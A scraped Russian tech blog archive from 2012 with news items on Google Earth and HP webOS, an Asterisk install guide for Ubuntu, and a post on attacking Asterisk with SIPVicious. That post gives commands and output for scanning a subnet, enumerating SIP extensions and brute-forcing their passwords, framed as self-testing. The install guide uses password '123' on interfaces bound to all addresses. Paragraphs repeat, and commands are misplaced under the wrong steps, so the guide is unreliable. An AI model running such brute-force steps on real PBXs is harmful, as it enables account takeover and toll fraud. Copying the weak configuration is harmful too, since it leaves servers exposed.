В новой версии Google Earth начали использовать доработанный алгоритм склеивания фотографий, и теперь даже в том случае если снимки были сделаны разными спутниками/самолетами, в разное время года и при разной погоде, они все равно будут выглядеть на карте более однородно чем раньше.


пятница, 27 января 2012 г.
четверг, 26 января 2012 г.
HP: открытая версия webOS в сентябре, фреймворк Enyo 2.0 — уже сейчас
В ноябре прошлого года судьба webOS, проекта, в который HP вложила $1,2 млрд, была под большим вопросом. Но месяц спустя компания все-таки определилась и присвоила этой платформе статус проекта с открытым исходным кодом. Теперь же стали появляться первые результаты данного решения.

В частности, HP пообещала, что полностью открытый вариант операционной системы, названный Open webOS 1.0, будет доступен всем желающим в сентябре этого года, о чем она сообщила на официальном сайте. А разработчикам компания предоставила фреймворк Enyo второго поколения. Этот инструмент позволит создавать webOS-приложения для планшетов, смартфонов и настольных веб-браузеров. Как и оригинальный фреймворк, Enyo 2.0 поддерживает WebKit, плюс он получил совместимость с такими современными веб-браузерами как Firefox, Chrome и Safari.
Кроме того, HP объявила о том, что webOS будет использовать стандартное ядро Linux. Это облегчит производителям устройств переход на новую платформу, если они никогда не имели дел с webOS, но при этом знакомы с Android и другими платформами на базе Linux. Фреймворк Enyo 2.0 доступен уже сейчас на официальном сайте.
В частности, HP пообещала, что полностью открытый вариант операционной системы, названный Open webOS 1.0, будет доступен всем желающим в сентябре этого года, о чем она сообщила на официальном сайте. А разработчикам компания предоставила фреймворк Enyo второго поколения. Этот инструмент позволит создавать webOS-приложения для планшетов, смартфонов и настольных веб-браузеров. Как и оригинальный фреймворк, Enyo 2.0 поддерживает WebKit, плюс он получил совместимость с такими современными веб-браузерами как Firefox, Chrome и Safari.
Кроме того, HP объявила о том, что webOS будет использовать стандартное ядро Linux. Это облегчит производителям устройств переход на новую платформу, если они никогда не имели дел с webOS, но при этом знакомы с Android и другими платформами на базе Linux. Фреймворк Enyo 2.0 доступен уже сейчас на официальном сайте.
вторник, 24 января 2012 г.
Ставим сервер Asterisk на Ubuntu
Заметьте, для целей самого Asterisk и Asterisk GUI LAMP сервер не нужен, у Asterisk’а есть свой.
1. Установим сам asterisk, дополнительные звуковые файлы и поддержку mp3-файлов:
а) Поставим предварительные пакеты:
!ВАЖНО!
1. В пакете Ubuntu идет файл http.conf со знаком ‘+’ в начале файла. Из-за него не стартует встроенный сервер Астериска. Плюсик надо убрать (а лучше вообще стереть все лишнее и оставить только нужное).
2. Кроме этого, в файле manager.conf есть включение внешнего файла, из-за которого подключение менеджера тоже не стартует. Это еще один аргумент в пользу того, что лучше удалить из файлов все лишнее и оставить только нужное.
1. Установим сам asterisk, дополнительные звуковые файлы и поддержку mp3-файлов:
sudo apt-get install asterisk asterisk-sounds-extra asterisk-mp3В процессе установки отвечаем на единственный вопрос о коде страны, в которой находимся – 7 (Россия).2. Далее ставим GUI
а) Поставим предварительные пакеты:
sudo apt-get install build-essential subversionб) Копируем исходники с сайта Digium
svn co http://svn.digium.com/svn/asterisk-gui/branches/2.0/ asterisk-guiв) Ждем, пока пробежит список файлов и переходим в папку с исходниками
cd asterisk-guiг) Конфигурируем
sudo ./configureд) Собираем и ставим
sudo makeе) Так как установка была от пользователя root, изменим владельца и группу папки, в которую была установка
sudo make install
sudo chown asterisk -R /var/lib/asterisk/ж) Настраиваем файлы конфигурации
sudo chgrp asterisk -R /var/lib/asterisk/
!ВАЖНО!
1. В пакете Ubuntu идет файл http.conf со знаком ‘+’ в начале файла. Из-за него не стартует встроенный сервер Астериска. Плюсик надо убрать (а лучше вообще стереть все лишнее и оставить только нужное).
2. Кроме этого, в файле manager.conf есть включение внешнего файла, из-за которого подключение менеджера тоже не стартует. Это еще один аргумент в пользу того, что лучше удалить из файлов все лишнее и оставить только нужное.
sudo nano /etc/asterisk/http.confРедактируем:
[general]Для доступа к GUI укажем пользователя admin с паролем 123 (в реальности пароль лучше указать серьезный)
enabled=yes
enablestatic=yes
bindaddr=0.0.0.0
bindport=8088
prefix=asterisk
sudo nano /etc/asterisk/manager.confРедактируем:
[general]з) Создаем символьную ссылку (т.к. папка /usr/share/asterisk/static-http у меня уже присутствовала, то сначала ее удаляем), парсер меняет сочетания буковок r m – r f, это надо учесть
enabled = yes
port = 5038
bindaddr = 0.0.0.0
webenabled = yes
[admin]
secret = 123
read = system,call,log,verbose,command,agent,user,config
write = system,call,log,verbose,command,agent,user,config
sudo эрэм эрэф /usr/share/asterisk/static-httpи) Проверим установку
sudo ln -s /var/lib/asterisk/static-http/ /usr/share/asterisk/
sudo make checkconfigк) Перезапускаем Asterisk
sudo /etc/init.d/asterisk stopл) GUI должен быть доступен по адресу машины, на которой он установлен:
sudo /etc/init.d/asterisk start
http://IP:8088/asterisk/static/config/index.html
воскресенье, 22 января 2012 г.
Безопастность Asterisk
Не буду рассказывать, как вы должны защищаться от хацкеров, просто посмотрим как можно проверить свой asterisk на дыры.
Итак есть чудный набор скриптов для этих экспериментов. Называется SIPVicious.
Для того чтобы найти уязвимые акки используются утилиты из пакета SIPVicious: каждая из них работает в консоли и может запускать как под виндой, так и линухом.
Для этого сначала просканируем заданную подсеть (скажем, это будет 192.168.1.1/24), чтобы найти BPX:
./svmap 192.168.1.1/24
| SIP Device | User Agent |
-------------------------------------
| 192.168.1.103:5060 | Asterisk PBX |
Таким образом, мы нашли нашу АТС-ку. Далее необходимо провести ее анализ и отыскать extention’s:
./svwar.py 192.168.1.103
| Extension | Authentication |
------------------------------
| 123 | reqauth |
| 100 | reqauth |
| 101 | noauth |
И хотя результат для нас вряд ли можно назвать неожиданным, мы видим, что номер 101 не требует авторизации. А для 100 и 123 требуется ввести пароль.
Попробуем подобрать его для 100, используя подбор по числовым значениям (а они используются более чем часто):
Пароль подобран! Теперь попробуем взломать пасс для аккаунта 123, используя словарик:
./svcrack.py 192.168.1.103 -u 123 -d dictionary.txt
| Extension | Password |
------------------------
| 123 | secret |
Пассы найдены: осталось подставить найденные логин-пароль в свой SIP клиент и проверить их в действии. Конечно, вероятность успешного брутфорса на отдельно взятый аккаунт невелика. Но среди сотен extentionов всегда найдется хотя бы один со слабым паролем. Более того, подход “обнаружить bpx, найти extention, подобрать пароль” является одной из самых простых на VoIP.
Никоим образом не несу ответственности за чьи то взломанные PBX. Пост написан для проверки себя на дыры и в ознакомительных целях. Всем удачной защиты)
Итак есть чудный набор скриптов для этих экспериментов. Называется SIPVicious.
Для того чтобы найти уязвимые акки используются утилиты из пакета SIPVicious: каждая из них работает в консоли и может запускать как под виндой, так и линухом.
Для этого сначала просканируем заданную подсеть (скажем, это будет 192.168.1.1/24), чтобы найти BPX:
./svmap 192.168.1.1/24
| SIP Device | User Agent |
-------------------------------------
| 192.168.1.103:5060 | Asterisk PBX |
./svwar.py 192.168.1.103
| Extension | Authentication |
------------------------------
| 123 | reqauth |
| 100 | reqauth |
| 101 | noauth |
Попробуем подобрать его для 100, используя подбор по числовым значениям (а они используются более чем часто):
./svcrack.py 192.168.1.103 -u 100 | Extension | Password | ------------------------ | 100 | 100 | |
Пароль подобран! Теперь попробуем взломать пасс для аккаунта 123, используя словарик:
./svcrack.py 192.168.1.103 -u 123 -d dictionary.txt
| Extension | Password |
------------------------
| 123 | secret |
Никоим образом не несу ответственности за чьи то взломанные PBX. Пост написан для проверки себя на дыры и в ознакомительных целях. Всем удачной защиты)
суббота, 21 января 2012 г.
Подписаться на:
Сообщения (Atom)